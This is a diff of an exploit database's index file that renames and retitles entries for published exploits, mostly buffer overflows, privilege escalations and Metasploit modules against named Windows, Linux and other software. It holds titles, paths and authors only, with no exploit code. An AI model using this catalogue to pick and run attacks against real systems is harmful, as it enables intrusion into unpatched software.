15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0
15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow",2010-12-12,m_101,windows,local,0
@ -6977,14 +6977,14 @@ id,file,description,date,author,platform,type,port
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0
15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0
15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0
16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0
15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0
15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
@ -7094,7 +7094,7 @@ id,file,description,date,author,platform,type,port
16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0
16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - (SEH) Exploit",2011-03-18,"Anastasios Monachos",windows,local,0
16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Exploit (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0
17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0
17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0
17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0
@ -7149,7 +7149,7 @@ id,file,description,date,author,platform,type,port
17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
@ -7222,12 +7222,12 @@ id,file,description,date,author,platform,type,port
18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0
18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,windows,local,0
18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
@ -7676,7 +7676,7 @@ id,file,description,date,author,platform,type,port
20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0
20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0
20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0
20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
@ -8314,7 +8314,7 @@ id,file,description,date,author,platform,type,port
26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0
26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0
26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - (SEH) Overflow",2013-07-01,"Jacob Holcomb",windows,local,0
26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - Overflow (SEH)",2013-07-01,"Jacob Holcomb",windows,local,0
26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0
26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0
26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0
@ -8412,7 +8412,7 @@ id,file,description,date,author,platform,type,port
29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0
29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",windows,local,0
29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0
29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
@ -8422,9 +8422,9 @@ id,file,description,date,author,platform,type,port
29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0
29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0
29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0
29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",windows,local,0
30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)",2013-12-09,"Mike Czumak",windows,local,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",windows,local,0
30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0
29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
29801,platforms/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0
@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port
36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local,0
36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,windows,local,0
36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port
38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0
40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local,0
38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
@ -8824,8 +8824,8 @@ id,file,description,date,author,platform,type,port
38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0
38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
@ -9228,12 +9228,15 @@ id,file,description,date,author,platform,type,port
42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
@ -9387,7 +9390,7 @@ id,file,description,date,author,platform,type,port
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535
361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21
378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21
@ -10515,7 +10518,7 @@ id,file,description,date,author,platform,type,port
9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0
9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0
9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0
@ -10560,7 +10563,7 @@ id,file,description,date,author,platform,type,port
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123
@ -10645,7 +10648,7 @@ id,file,description,date,author,platform,type,port
10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - (SEH) Exploit",2009-12-29,Lincoln,windows,remote,6660
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660
10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0
@ -10756,7 +10759,7 @@ id,file,description,date,author,platform,type,port
13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80
13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
@ -10973,7 +10976,7 @@ id,file,description,date,author,platform,type,port
16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0
16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
16320,platforms/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0
16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0
16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0
@ -11445,7 +11448,7 @@ id,file,description,date,author,platform,type,port
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@ -12221,7 +12224,7 @@ id,file,description,date,author,platform,type,port
20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0
20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0
20340,platforms/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0
20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote,0
20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
@ -12524,7 +12527,7 @@ id,file,description,date,author,platform,type,port
21021,platforms/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote,0
21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0
